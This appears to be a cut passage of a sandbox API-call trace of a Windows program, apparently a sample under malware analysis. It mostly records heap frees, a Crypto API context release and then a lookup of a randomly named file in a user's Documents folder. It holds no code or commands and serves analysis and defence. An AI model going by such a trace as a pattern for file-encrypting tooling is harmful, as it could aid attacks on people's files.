PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0076.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0076.872] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0076.872] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0076.872] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0076.872] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0076.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0076.873] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.873] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0076.873] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0076.873] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0076.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.874] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0076.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.875] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.875] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0076.876] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.876] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.876] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0076.876] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0076.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0076.877] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0076.877] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0076.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0076.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0076.878] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0076.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0076.879] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0076.880] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.880] FreeLibrary (hLibModule=0x756e0000) returned 1 [0076.880] CloseHandle (hObject=0x298) returned 1 [0076.880] CloseHandle (hObject=0x258) returned 1 [0076.882] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Lh2OVLi_4PS_2RxxQd.odp", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Lh2OVLi_4PS_2RxxQd.odp", lpFilePart=0x0) returned 0x30 [0076.882] GetFileAttributesW 